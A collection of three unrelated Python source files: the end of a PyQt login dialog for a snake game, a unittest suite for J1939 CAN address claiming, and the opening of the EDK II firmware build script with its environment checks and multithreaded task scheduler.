self.pick.setGeometry(QtCore.QRect(10,50, 241, 22))
self.pick.setObjectName("pick_color")
self.pick.setStyleSheet("Font: 8pt")
self.userName = QtWidgets.QLineEdit(Dialog)
self.userName.setGeometry(QtCore.QRect(125, 20, 241, 22))
self.userName.setObjectName("userName")
self.userName.setStyleSheet("background: rgb(255, 255, 255)")
self.userName.setMaxLength(7)
self.userName.setPlaceholderText("can only use up to 7 letters :)")
self.enterGame = QtWidgets.QPushButton(Dialog)
self.enterGame.setGeometry(QtCore.QRect(170, 125, 175, 50))
self.enterGame.setObjectName("enterGame")
self.enterGame.clicked.connect(self.enter_game)
self.enterGame.setStyleSheet("background: rgb(130, 255, 127)")
self.enterGame.setCursor(QCursor(Qt.PointingHandCursor))
self.pickcolor = QtWidgets.QPushButton(Dialog)
self.pickcolor.setGeometry(QtCore.QRect(125, 50, 241, 28))
self.pickcolor.setObjectName("pickcolor")
self.pickcolor.setStyleSheet("background: rgb(255, 255, 255)")
self.pickcolor.clicked.connect(self.colorDialog)
self.pickcolor.setCursor(QCursor(Qt.PointingHandCursor))
self.framecolor = QtWidgets.QFrame(Dialog)
self.framecolor.setGeometry(QtCore.QRect(390, 30, 100, 75))
self.instructions = QtWidgets.QLabel(Dialog)
self.instructions.setGeometry(QtCore.QRect(140, 90, 241, 22))
self.instructions.setObjectName("instructions")
self.instructions.setStyleSheet("Font: 8pt")
self.framecolor.setStyleSheet("QWidget { background-color: %s}" %selectedColor.name())
self.retranslateUi(Dialog)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def colorDialog(self):
color = QColorDialog.getColor()
if color.isValid():
self.framecolor.setStyleSheet("QWidget { background-color: %s}" %color.name())
global selectedColor
selectedColor = color
def enter_game(self):
name = self.userName.text()
global userName
userName=name
self.main = Mainwindow(name)
self.main.show()
self.deleteLater()
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "Get ready to play Snok!"))
self.enterGame.setText(_translate("Dialog", "Enter Game"))
self.enterGame.setText(_translate("Dialog", "Enter Game"))
self.pickcolor.setText(_translate("Dialog", "Pick Color"))
self.userLabel.setText(_translate("Dialog", "Enter nickname: "))
self.pick.setText(_translate("Dialog", "Choose your color: "))
self.instructions.setText(_translate("Dialog", 'Move with "WASD" or the arrow keys!'))
def main():
app = QtWidgets.QApplication(sys.argv)
login = LoginDialog()
login.setWindowFlags(Qt.Window)
login.show()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
|
test_ca.py
|
# for standalone-test
import sys
sys.path.append(".")
import unittest
import time
import threading
try:
# Python27
import Queue as queue
except ImportError:
# Python35
import queue
import j1939
class TestCA(unittest.TestCase):
# TODO: should we change the async_can_feeder to use the can backend with
# bustype 'virtual' instead of injecting our messages directly?
class MsgType(object):
CANRX = 0
CANTX = 1
PDU = 2
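# Each queued entry is a tuple (MsgType, can_id, data, timestamp); a timestamp of 0.0 means "use the current time".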
def _async_can_feeder(self):
"""Asynchronous feeder"""
while True:
message = self.message_queue.get(block=True)
if message is self.STOP_THREAD:
break
recv_time = message[3]
if recv_time == 0.0:
recv_time = time.time()
self.ecu.notify(message[1], message[2], recv_time)
def _inject_messages_into_ecu(self):
while self.can_messages and self.can_messages[0][0] == TestCA.MsgType.CANRX:
message = self.can_messages.pop(0)
self.message_queue.put(message)
def _send_message(self, can_id, data):
"""Will be used instead of the usual ecu.send_message method.
Checks the message sent and generates the appropriate answer.
The data is fed from self.can_messages.
"""
expected_data = self.can_messages.pop(0)
self.assertEqual(expected_data[0], TestCA.MsgType.CANTX, "No transmission was expected")
self.assertEqual(can_id, expected_data[1])
self.assertSequenceEqual(data, expected_data[2])
self._inject_messages_into_ecu()
def _on_message(self, pgn, data):
"""Feed incoming message to this testcase.
:param int pgn:
Parameter Group Number of the message
:param bytearray data:
Data of the PDU
"""
expected_data = self.pdus.pop(0)
self.assertEqual(expected_data[0], TestCA.MsgType.PDU)
self.assertEqual(pgn, expected_data[1])
self.assertSequenceEqual(data, expected_data[2])
def setUp(self):
"""Called before each test methode.
Method called to prepare the test fixture. This is called immediately
before calling the test method; other than AssertionError or SkipTest,
any exception raised by this method will be considered an error rather
than a test failure. The default implementation does nothing.
"""
self.can_messages = []
self.pdus = []
self.STOP_THREAD = object()
self.message_queue = queue.Queue()
self.message_thread = threading.Thread(target=self._async_can_feeder)
self.message_thread.start()
self.ecu = j1939.ElectronicControlUnit()
# redirect the send_message from the can bus to our simulation
self.ecu.send_message = self._send_message
def tearDown(self):
"""Called after each test methode.
Method called immediately after the test method has been called and
the result recorded. This is called even if the test method raised an
exception, so the implementation in subclasses may need to be
particularly careful about checking internal state. Any exception,
other than AssertionError or SkipTest, raised by this method will be
considered an additional error rather than a test failure (thus
increasing the total number of reported errors). This method will only
be called if the setUp() succeeds, regardless of the outcome of the
test method. The default implementation does nothing.
"""
self.ecu.stop()
self.message_queue.put(self.STOP_THREAD)
self.message_thread.join()
def test_addr_claim_fixed(self):
"""Test CA Address claim on the bus with fixed address
This test runs a "Single Address Capable" claim procedure with a fixed
address of 128.
"""
self.can_messages = [
(TestCA.MsgType.CANTX, 0x18EEFF80, [83, 54, 201, 130, 83, 82, 214, 135], 0.0), # Address Claimed
]
name = j1939.Name(
arbitrary_address_capable=0,
industry_group=j1939.Name.IndustryGroup.Industrial,
vehicle_system_instance=2,
vehicle_system=155,
function=201,
function_instance=16,
ecu_instance=2,
manufacturer_code=666,
identity_number=1234567
)
# create new CA on the bus with given NAME and ADDRESS
new_ca = self.ecu.add_ca(name=name, device_address=128)
# by starting the CA it announces the given ADDRESS on the bus
new_ca.start()
# wait until all messages are processed asynchronously
while len(self.can_messages)>0:
time.sleep(0.500)
# wait for final processing
time.sleep(0.500)
self.assertEqual(new_ca.state, j1939.ControllerApplication.State.NORMAL)
def test_addr_claim_fixed_veto_lose(self):
"""Test CA Address claim on the bus with fixed address and a veto counterpart
This test runs a "Single Address Capable" claim procedure with a fixed
address of 128. A counterpart on the bus declines the address claimed message
with a veto and we lose our address.
"""
self.can_messages = [
(TestCA.MsgType.CANTX, 0x18EEFF80, [83, 54, 201, 130, 83, 82, 214, 135], 0.0), # Address Claimed
(TestCA.MsgType.CANRX, 0x18EEFF80, [83, 54, 111, 130, 83, 82, 214, 135], 0.0), # Veto from Counterpart with lower name
(TestCA.MsgType.CANTX, 0x18EEFFFE, [83, 54, 201, 130, 83, 82, 214, 135], 0.0), # CANNOT CLAIM
]
name = j1939.Name(
arbitrary_address_capable=0,
industry_group=j1939.Name.IndustryGroup.Industrial,
vehicle_system_instance=2,
vehicle_system=155,
function=201,
function_instance=16,
ecu_instance=2,
manufacturer_code=666,
identity_number=1234567
)
# create new CA on the bus with given NAME and ADDRESS
new_ca = self.ecu.add_ca(name=name, device_address=128)
# by starting the CA it announces the given ADDRESS on the bus
new_ca.start()
# wait until all messages are processed asynchronously
while len(self.can_messages)>0:
time.sleep(0.500)
# wait for final processing
time.sleep(0.500)
self.assertEqual(new_ca.state, j1939.ControllerApplication.State.CANNOT_CLAIM)
def test_addr_claim_fixed_veto_win(self):
"""Test CA Address claim on the bus with fixed address and a veto counterpart
This test runs a "Single Address Capable" claim procedure with a fixed
address of 128. A counterpart on the bus declines the address claimed message
with a veto, but our NAME is lower, so we keep the claimed address.
"""
self.can_messages = [
(TestCA.MsgType.CANTX, 0x18EEFF80, [83, 54, 201, 130, 83, 82, 214, 135], 0.0), # Address Claimed
(TestCA.MsgType.CANRX, 0x18EEFF80, [83, 54, 222, 130, 83, 82, 214, 135], 0.0), # Veto from Counterpart with higher name
(TestCA.MsgType.CANTX, 0x18EEFF80, [83, 54, 201, 130, 83, 82, 214, 135], 0.0), # resend Address Claimed
]
name = j1939.Name(
arbitrary_address_capable=0,
industry_group=j1939.Name.IndustryGroup.Industrial,
vehicle_system_instance=2,
vehicle_system=155,
function=201,
function_instance=16,
ecu_instance=2,
manufacturer_code=666,
identity_number=1234567
)
# create new CA on the bus with given NAME and ADDRESS
new_ca = self.ecu.add_ca(name=name, device_address=128)
# by starting the CA it announces the given ADDRESS on the bus
new_ca.start()
# wait until all messages are processed asynchronously
while len(self.can_messages)>0:
time.sleep(0.500)
# wait for final processing
time.sleep(0.500)
self.assertEqual(new_ca.state, j1939.ControllerApplication.State.NORMAL)
def test_addr_claim_arbitrary_veto_lose(self):
"""Test CA Address claim on the bus with arbitrary capability a veto counterpart
This test runs a "Arbitrary Address Capable" claim procedure with an
address of 128. A counterpart on the bus declines the address claimed message
with a veto and we lose our address. Our device should claim the next address
(129) automatically.
"""
self.can_messages = [
(TestCA.MsgType.CANTX, 0x18EEFF80, [211, 54, 201, 130, 83, 82, 214, 135], 0.0), # Address Claimed 128
(TestCA.MsgType.CANRX, 0x18EEFF80, [83, 54, 111, 130, 83, 82, 214, 135], 0.0), # Veto from Counterpart with lower name
(TestCA.MsgType.CANTX, 0x18EEFF81, [211, 54, 201, 130, 83, 82, 214, 135], 0.0), # Address Claimed 129
]
name = j1939.Name(
arbitrary_address_capable=1,
industry_group=j1939.Name.IndustryGroup.Industrial,
vehicle_system_instance=2,
vehicle_system=155,
function=201,
function_instance=16,
ecu_instance=2,
manufacturer_code=666,
identity_number=1234567
)
# create new CA on the bus with given NAME and ADDRESS
new_ca = self.ecu.add_ca(name=name, device_address=128)
# by starting the CA it announces the given ADDRESS on the bus
new_ca.start()
# wait until all messages are processed asynchronously
while len(self.can_messages)>0:
time.sleep(0.500)
# wait for final processing
time.sleep(0.500)
self.assertEqual(new_ca.state, j1939.ControllerApplication.State.NORMAL)
if __name__ == '__main__':
unittest.main()
|
build.py
|
## @file
# build a platform or a module
#
# Copyright (c) 2014, Hewlett-Packard Development Company, L.P.<BR>
# Copyright (c) 2007 - 2018, Intel Corporation. All rights reserved.<BR>
# Copyright (c) 2018, Hewlett Packard Enterprise Development, L.P.<BR>
#
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
##
# Import Modules
#
from __future__ import print_function
import Common.LongFilePathOs as os
import re
from io import BytesIO
import sys
import glob
import time
import platform
import traceback
import encodings.ascii
import itertools
import multiprocessing
from struct import *
from threading import *
from optparse import OptionParser
from subprocess import *
from Common import Misc as Utils
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.TargetTxtClassObject import *
from Common.ToolDefClassObject import *
from Common.DataType import *
from Common.BuildVersion import gBUILD_VERSION
from AutoGen.AutoGen import *
from Common.BuildToolError import *
from Workspace.WorkspaceDatabase import WorkspaceDatabase
from Common.MultipleWorkspace import MultipleWorkspace as mws
from BuildReport import BuildReport
from GenPatchPcdTable.GenPatchPcdTable import *
from PatchPcdValue.PatchPcdValue import *
import Common.EdkLogger
import Common.GlobalData as GlobalData
from GenFds.GenFds import GenFds, GenFdsApi
from collections import OrderedDict, defaultdict
# Version and Copyright
VersionNumber = "0.60" + ' ' + gBUILD_VERSION
__version__ = "%prog Version " + VersionNumber
__copyright__ = "Copyright (c) 2007 - 2018, Intel Corporation All rights reserved."
## standard targets of build command
gSupportedTarget = ['all', 'genc', 'genmake', 'modules', 'libraries', 'fds', 'clean', 'cleanall', 'cleanlib', 'run']
## build configuration file
gBuildConfiguration = "target.txt"
gToolsDefinition = "tools_def.txt"
TemporaryTablePattern = re.compile(r'^_\d+_\d+_[a-fA-F0-9]+$')
TmpTableDict = {}
## Check environment PATH variable to make sure the specified tool is found
#
# If the tool is found in the PATH, then True is returned
# Otherwise, False is returned
#
def IsToolInPath(tool):
if 'PATHEXT' in os.environ:
extns = os.environ['PATHEXT'].split(os.path.pathsep)
else:
extns = ('',)
for pathDir in os.environ['PATH'].split(os.path.pathsep):
for ext in extns:
if os.path.exists(os.path.join(pathDir, tool + ext)):
return True
return False
## Check environment variables
#
# Check environment variables that must be set for build. Currently they are
#
# WORKSPACE The directory all packages/platforms start from
# EDK_TOOLS_PATH The directory contains all tools needed by the build
# PATH $(EDK_TOOLS_PATH)/Bin/<sys> must be set in PATH
#
# If any of above environment variable is not set or has error, the build
# will be broken.
#
def CheckEnvVariable():
# check WORKSPACE
if "WORKSPACE" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="WORKSPACE")
WorkspaceDir = os.path.normcase(os.path.normpath(os.environ["WORKSPACE"]))
if not os.path.exists(WorkspaceDir):
EdkLogger.error("build", FILE_NOT_FOUND, "WORKSPACE doesn't exist", ExtraData=WorkspaceDir)
elif ' ' in WorkspaceDir:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in WORKSPACE path",
ExtraData=WorkspaceDir)
os.environ["WORKSPACE"] = WorkspaceDir
# set multiple workspace
PackagesPath = os.getenv("PACKAGES_PATH")
mws.setWs(WorkspaceDir, PackagesPath)
if mws.PACKAGES_PATH:
for Path in mws.PACKAGES_PATH:
if not os.path.exists(Path):
EdkLogger.error("build", FILE_NOT_FOUND, "One Path in PACKAGES_PATH doesn't exist", ExtraData=Path)
elif ' ' in Path:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in PACKAGES_PATH", ExtraData=Path)
#
# Check EFI_SOURCE (Edk build convention). EDK_SOURCE will always point to ECP
#
if "ECP_SOURCE" not in os.environ:
os.environ["ECP_SOURCE"] = mws.join(WorkspaceDir, GlobalData.gEdkCompatibilityPkg)
if "EFI_SOURCE" not in os.environ:
os.environ["EFI_SOURCE"] = os.environ["ECP_SOURCE"]
if "EDK_SOURCE" not in os.environ:
os.environ["EDK_SOURCE"] = os.environ["ECP_SOURCE"]
#
# Unify case of characters on case-insensitive systems
#
EfiSourceDir = os.path.normcase(os.path.normpath(os.environ["EFI_SOURCE"]))
EdkSourceDir = os.path.normcase(os.path.normpath(os.environ["EDK_SOURCE"]))
EcpSourceDir = os.path.normcase(os.path.normpath(os.environ["ECP_SOURCE"]))
os.environ["EFI_SOURCE"] = EfiSourceDir
os.environ["EDK_SOURCE"] = EdkSourceDir
os.environ["ECP_SOURCE"] = EcpSourceDir
os.environ["EDK_TOOLS_PATH"] = os.path.normcase(os.environ["EDK_TOOLS_PATH"])
if not os.path.exists(EcpSourceDir):
EdkLogger.verbose("ECP_SOURCE = %s doesn't exist. Edk modules could not be built." % EcpSourceDir)
elif ' ' in EcpSourceDir:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in ECP_SOURCE path",
ExtraData=EcpSourceDir)
if not os.path.exists(EdkSourceDir):
if EdkSourceDir == EcpSourceDir:
EdkLogger.verbose("EDK_SOURCE = %s doesn't exist. Edk modules could not be built." % EdkSourceDir)
else:
EdkLogger.error("build", PARAMETER_INVALID, "EDK_SOURCE does not exist",
ExtraData=EdkSourceDir)
elif ' ' in EdkSourceDir:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in EDK_SOURCE path",
ExtraData=EdkSourceDir)
if not os.path.exists(EfiSourceDir):
if EfiSourceDir == EcpSourceDir:
EdkLogger.verbose("EFI_SOURCE = %s doesn't exist. Edk modules could not be built." % EfiSourceDir)
else:
EdkLogger.error("build", PARAMETER_INVALID, "EFI_SOURCE does not exist",
ExtraData=EfiSourceDir)
elif ' ' in EfiSourceDir:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in EFI_SOURCE path",
ExtraData=EfiSourceDir)
# check those variables on single workspace case
if not PackagesPath:
# change absolute path to relative path to WORKSPACE
if EfiSourceDir.upper().find(WorkspaceDir.upper()) != 0:
EdkLogger.error("build", PARAMETER_INVALID, "EFI_SOURCE is not under WORKSPACE",
ExtraData="WORKSPACE = %s\n EFI_SOURCE = %s" % (WorkspaceDir, EfiSourceDir))
if EdkSourceDir.upper().find(WorkspaceDir.upper()) != 0:
EdkLogger.error("build", PARAMETER_INVALID, "EDK_SOURCE is not under WORKSPACE",
ExtraData="WORKSPACE = %s\n EDK_SOURCE = %s" % (WorkspaceDir, EdkSourceDir))
if EcpSourceDir.upper().find(WorkspaceDir.upper()) != 0:
EdkLogger.error("build", PARAMETER_INVALID, "ECP_SOURCE is not under WORKSPACE",
ExtraData="WORKSPACE = %s\n ECP_SOURCE = %s" % (WorkspaceDir, EcpSourceDir))
# check EDK_TOOLS_PATH
if "EDK_TOOLS_PATH" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="EDK_TOOLS_PATH")
# check PATH
if "PATH" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="PATH")
GlobalData.gWorkspace = WorkspaceDir
GlobalData.gEfiSource = EfiSourceDir
GlobalData.gEdkSource = EdkSourceDir
GlobalData.gEcpSource = EcpSourceDir
GlobalData.gGlobalDefines["WORKSPACE"] = WorkspaceDir
GlobalData.gGlobalDefines["EFI_SOURCE"] = EfiSourceDir
GlobalData.gGlobalDefines["EDK_SOURCE"] = EdkSourceDir
GlobalData.gGlobalDefines["ECP_SOURCE"] = EcpSourceDir
GlobalData.gGlobalDefines["EDK_TOOLS_PATH"] = os.environ["EDK_TOOLS_PATH"]
## Get normalized file path
#
# Convert the path to be local format, and remove the WORKSPACE path at the
# beginning if the file path is given in full path.
#
# @param FilePath File path to be normalized
# @param Workspace Workspace path which the FilePath will be checked against
#
# @retval string The normalized file path
#
def NormFile(FilePath, Workspace):
# check if the path is absolute or relative
if os.path.isabs(FilePath):
FileFullPath = os.path.normpath(FilePath)
else:
FileFullPath = os.path.normpath(mws.join(Workspace, FilePath))
Workspace = mws.getWs(Workspace, FilePath)
# check if the file path exists or not
if not os.path.isfile(FileFullPath):
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData="\t%s (Please give file in absolute path or relative to WORKSPACE)" % FileFullPath)
# remove workspace directory from the beginning part of the file path
if Workspace[-1] in ["\\", "/"]:
return FileFullPath[len(Workspace):]
else:
return FileFullPath[(len(Workspace) + 1):]
## Get the output of an external program
#
# This is the entry point of the thread that reads the output of an external program and
# puts it into STDOUT/STDERR of the current program.
#
# @param From The stream message read from
# @param To The stream message put on
# @param ExitFlag The flag used to indicate stopping reading
#
def ReadMessage(From, To, ExitFlag):
while True:
# read one line a time
Line = From.readline()
# empty string means "end"
if Line is not None and Line != "":
To(Line.rstrip())
else:
break
if ExitFlag.isSet():
break
## Launch an external program
#
# This method will call subprocess.Popen to execute an external program with
# given options in specified directory. Because of the dead-lock issue during
# redirecting output of the external program, threads are used to do the
# redirection work.
#
# @param Command A list or string containing the call of the program
# @param WorkingDir The directory in which the program will be running
#
def LaunchCommand(Command, WorkingDir):
BeginTime = time.time()
# if working directory doesn't exist, Popen() will raise an exception
if not os.path.isdir(WorkingDir):
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=WorkingDir)
# Command is used as the first Argument in following Popen().
# It could be a string or sequence. We find that if command is a string in following Popen(),
# ubuntu may fail with an error message that the command is not found.
# So here we may need to convert the command from a string to a list.
if platform.system() != 'Windows':
if not isinstance(Command, list):
Command = Command.split()
Command = ' '.join(Command)
Proc = None
EndOfProcedure = None
try:
# launch the command
Proc = Popen(Command, stdout=PIPE, stderr=PIPE, env=os.environ, cwd=WorkingDir, bufsize=-1, shell=True)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Proc.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Proc.stdout, EdkLogger.info, EndOfProcedure))
StdOutThread.setName("STDOUT-Redirector")
StdOutThread.setDaemon(False)
StdOutThread.start()
if Proc.stderr:
StdErrThread = Thread(target=ReadMessage, args=(Proc.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
Proc.wait()
except: # in case of aborting
# terminate the threads redirecting the program output
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
if EndOfProcedure is not None:
EndOfProcedure.set()
if Proc is None:
if not isinstance(Command, type("")):
Command = " ".join(Command)
EdkLogger.error("build", COMMAND_FAILURE, "Failed to start command", ExtraData="%s [%s]" % (Command, WorkingDir))
if Proc.stdout:
StdOutThread.join()
if Proc.stderr:
StdErrThread.join()
# check the return code of the program
if Proc.returncode != 0:
if not isinstance(Command, type("")):
Command = " ".join(Command)
# print out the Response file and its content when make failure
RespFile = os.path.join(WorkingDir, 'OUTPUT', 'respfilelist.txt')
if os.path.isfile(RespFile):
f = open(RespFile)
RespContent = f.read()
f.close()
EdkLogger.info(RespContent)
EdkLogger.error("build", COMMAND_FAILURE, ExtraData="%s [%s]" % (Command, WorkingDir))
return "%dms" % (int(round((time.time() - BeginTime) * 1000)))
## The smallest unit that can be built in multi-thread build mode
#
# This is the base class of build unit. The "Obj" parameter must provide
# __str__(), __eq__() and __hash__() methods. Otherwise some build units could be
# missed during the build.
#
# Currently the "Obj" should be only ModuleAutoGen or PlatformAutoGen objects.
#
class BuildUnit:
## The constructor
#
# @param self The object pointer
# @param Obj The object the build is working on
# @param Target The build target name, one of gSupportedTarget
# @param Dependency The BuildUnit(s) which must be completed in advance
# @param WorkingDir The directory build command starts in
#
def __init__(self, Obj, BuildCommand, Target, Dependency, WorkingDir="."):
self.BuildObject = Obj
self.Dependency = Dependency
self.WorkingDir = WorkingDir
self.Target = Target
self.BuildCommand = BuildCommand
if not BuildCommand:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(Obj.BuildTarget, Obj.ToolChain, Obj.Arch),
ExtraData=str(Obj))
## str() method
#
# It just returns the string representation of self.BuildObject
#
# @param self The object pointer
#
def __str__(self):
return str(self.BuildObject)
## "==" operator method
#
# It just compares self.BuildObject with "Other". So self.BuildObject must
# provide its own __eq__() method.
#
# @param self The object pointer
# @param Other The other BuildUnit object compared to
#
def __eq__(self, Other):
return Other and self.BuildObject == Other.BuildObject \
and Other.BuildObject \
and self.BuildObject.Arch == Other.BuildObject.Arch
## hash() method
#
# It just returns the hash value of self.BuildObject which must be hashable.
#
# @param self The object pointer
#
def __hash__(self):
return hash(self.BuildObject) + hash(self.BuildObject.Arch)
def __repr__(self):
return repr(self.BuildObject)
## The smallest module unit that can be built by nmake/make command in multi-thread build mode
#
# This class is for module build by nmake/make build system. The "Obj" parameter
# must provide __str__(), __eq__() and __hash__() methods. Otherwise some make
# units could be missed during the build.
#
# Currently the "Obj" should be only ModuleAutoGen object.
#
class ModuleMakeUnit(BuildUnit):
## The constructor
#
# @param self The object pointer
# @param Obj The ModuleAutoGen object the build is working on
# @param Target The build target name, one of gSupportedTarget
#
def __init__(self, Obj, Target):
Dependency = [ModuleMakeUnit(La, Target) for La in Obj.LibraryAutoGenList]
BuildUnit.__init__(self, Obj, Obj.BuildCommand, Target, Dependency, Obj.MakeFileDir)
if Target in [None, "", "all"]:
self.Target = "tbuild"
## The smallest platform unit that can be built by nmake/make command in multi-thread build mode
#
# This class is for platform build by nmake/make build system. The "Obj" parameter
# must provide __str__(), __eq__() and __hash__() methods. Otherwise some make
# units could be missed during the build.
#
# Currently the "Obj" should be only PlatformAutoGen object.
#
class PlatformMakeUnit(BuildUnit):
## The constructor
#
# @param self The object pointer
# @param Obj The PlatformAutoGen object the build is working on
# @param Target The build target name, one of gSupportedTarget
#
def __init__(self, Obj, Target):
Dependency = [ModuleMakeUnit(Lib, Target) for Lib in Obj.LibraryAutoGenList]
Dependency.extend([ModuleMakeUnit(Mod, Target) for Mod in Obj.ModuleAutoGenList])
BuildUnit.__init__(self, Obj, Obj.BuildCommand, Target, Dependency, Obj.MakeFileDir)
## The class representing the task of a module build or platform build
#
# This class manages the build tasks in multi-thread build mode. Its jobs include
# scheduling thread running, catching thread error, monitor the thread status, etc.
#
class BuildTask:
# queue for tasks waiting for schedule
_PendingQueue = OrderedDict()
_PendingQueueLock = threading.Lock()
# queue for tasks ready for running
_ReadyQueue = OrderedDict()
_ReadyQueueLock = threading.Lock()
# queue for run tasks
_RunningQueue = OrderedDict()
_RunningQueueLock = threading.Lock()
# queue containing all build tasks, in case duplicate build
_TaskQueue = OrderedDict()
# flag indicating error occurs in a running thread
_ErrorFlag = threading.Event()
_ErrorFlag.clear()
_ErrorMessage = ""
# BoundedSemaphore object used to control the number of running threads
_Thread = None
# flag indicating if the scheduler is started or not
_SchedulerStopped = threading.Event()
_SchedulerStopped.set()
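# Scheduler lifecycle: Scheduler() clears _SchedulerStopped on entry and sets it again on exit; WaitForComplete() blocks on that event, and IsOnGoing() reports whether it is still clear.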
## Start the task scheduler thread
#
# @param MaxThreadNumber The maximum thread number
# @param ExitFlag Flag used to end the scheduler
#
@staticmethod
def StartScheduler(MaxThreadNumber, ExitFlag):
SchedulerThread = Thread(target=BuildTask.Scheduler, args=(MaxThreadNumber, ExitFlag))
SchedulerThread.setName("Build-Task-Scheduler")
SchedulerThread.setDaemon(False)
SchedulerThread.start()
# wait for the scheduler to be started, especially useful in Linux
while not BuildTask.IsOnGoing():
time.sleep(0.01)
## Scheduler method
#
# @param MaxThreadNumber The maximum thread number
# @param ExitFlag Flag used to end the scheduler
#
@staticmethod
def Scheduler(MaxThreadNumber, ExitFlag):
BuildTask._SchedulerStopped.clear()
try:
# use BoundedSemaphore to control the maximum running threads
BuildTask._Thread = BoundedSemaphore(MaxThreadNumber)
#
# scheduling loop, which exits when there are no pending/ready tasks and it is
# indicated to do so, or when an error occurs in a running thread
#
while (len(BuildTask._PendingQueue) > 0 or len(BuildTask._ReadyQueue) > 0 \
or not ExitFlag.isSet()) and not BuildTask._ErrorFlag.isSet():
EdkLogger.debug(EdkLogger.DEBUG_8, "Pending Queue (%d), Ready Queue (%d)"
% (len(BuildTask._PendingQueue), len(BuildTask._ReadyQueue)))
# get all pending tasks
BuildTask._PendingQueueLock.acquire()
BuildObjectList = BuildTask._PendingQueue.keys()
#
                # check if their dependencies are resolved, and if so, move them
                # into the ready queue
#
for BuildObject in BuildObjectList:
Bt = BuildTask._PendingQueue[BuildObject]
if Bt.IsReady():
BuildTask._ReadyQueue[BuildObject] = BuildTask._PendingQueue.pop(BuildObject)
BuildTask._PendingQueueLock.release()
# launch build thread until the maximum number of threads is reached
while not BuildTask._ErrorFlag.isSet():
# empty ready queue, do nothing further
if len(BuildTask._ReadyQueue) == 0:
break
                    # wait for an active thread to exit
BuildTask._Thread.acquire(True)
# start a new build thread
Bo, Bt = BuildTask._ReadyQueue.popitem()
# move into running queue
BuildTask._RunningQueueLock.acquire()
BuildTask._RunningQueue[Bo] = Bt
BuildTask._RunningQueueLock.release()
Bt.Start()
                    # avoid a tight loop
time.sleep(0.01)
                # avoid a tight loop
time.sleep(0.01)
            # wait for all running threads to exit
if BuildTask._ErrorFlag.isSet():
                EdkLogger.quiet("\nWaiting for all build threads to exit...")
# while not BuildTask._ErrorFlag.isSet() and \
while len(BuildTask._RunningQueue) > 0:
EdkLogger.verbose("Waiting for thread ending...(%d)" % len(BuildTask._RunningQueue))
EdkLogger.debug(EdkLogger.DEBUG_8, "Threads [%s]" % ", ".join(Th.getName() for Th in threading.enumerate()))
                # avoid a tight loop
time.sleep(0.1)
except BaseException as X:
#
            # TRICK: hide the output of threads left running, so that the user can
# catch the error message easily
#
EdkLogger.SetLevel(EdkLogger.ERROR)
BuildTask._ErrorFlag.set()
BuildTask._ErrorMessage = "build thread scheduler error\n\t%s" % str(X)
BuildTask._PendingQueue.clear()
BuildTask._ReadyQueue.clear()
BuildTask._RunningQueue.clear()
BuildTask._TaskQueue.clear()
BuildTask._SchedulerStopped.set()
    ## Wait for all running threads to exit
#
@staticmethod
def WaitForComplete():
BuildTask._SchedulerStopped.wait()
## Check if the scheduler is running or not
#
@staticmethod
def IsOnGoing():
return not BuildTask._SchedulerStopped.isSet()
## Abort the build
@staticmethod
def Abort():
if BuildTask.IsOnGoing():
BuildTask._ErrorFlag.set()
BuildTask.WaitForComplete()
## Check if there's error in running thread
#
    # Since the main thread cannot catch exceptions raised in other threads, we have to
    # use threading.Event to communicate this information to the main thread.
#
@staticmethod
def HasError():
return BuildTask._ErrorFlag.isSet()
## Get error message in running thread
#
    # Since the main thread cannot catch exceptions raised in other threads, we have to
    # use a static variable to communicate this message to the main thread.
#
@staticmethod
def GetErrorMessage():
return BuildTask._ErrorMessage
## Factory method to create a BuildTask object
#
    # This method checks whether a module is being built or has already been built.
    # If so, it simply returns the associated BuildTask object from _TaskQueue. If
    # not, it creates and returns a new BuildTask object, which is also appended to
    # _PendingQueue for scheduling later.
#
# @param BuildItem A BuildUnit object representing a build object
# @param Dependency The dependent build object of BuildItem
#
@staticmethod
def New(BuildItem, Dependency=None):
if BuildItem in BuildTask._TaskQueue:
Bt = BuildTask._TaskQueue[BuildItem]
return Bt
Bt = BuildTask()
Bt._Init(BuildItem, Dependency)
BuildTask._TaskQueue[BuildItem] = Bt
BuildTask._PendingQueueLock.acquire()
BuildTask._PendingQueue[BuildItem] = Bt
BuildTask._PendingQueueLock.release()
return Bt
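    # Typical lifecycle of these tasks, as used by Build._BuildModule() and
    # Build._MultiThreadBuildPlatform() further below (illustrative sketch only;
    # BuildModules, Target and ThreadNumber are placeholders):
    #
    #   ExitFlag = threading.Event()
    #   ExitFlag.clear()
    #   for Ma in BuildModules:
    #       BuildTask.New(ModuleMakeUnit(Ma, Target))          # queue one task per module
    #       if not BuildTask.IsOnGoing():
    #           BuildTask.StartScheduler(ThreadNumber, ExitFlag)
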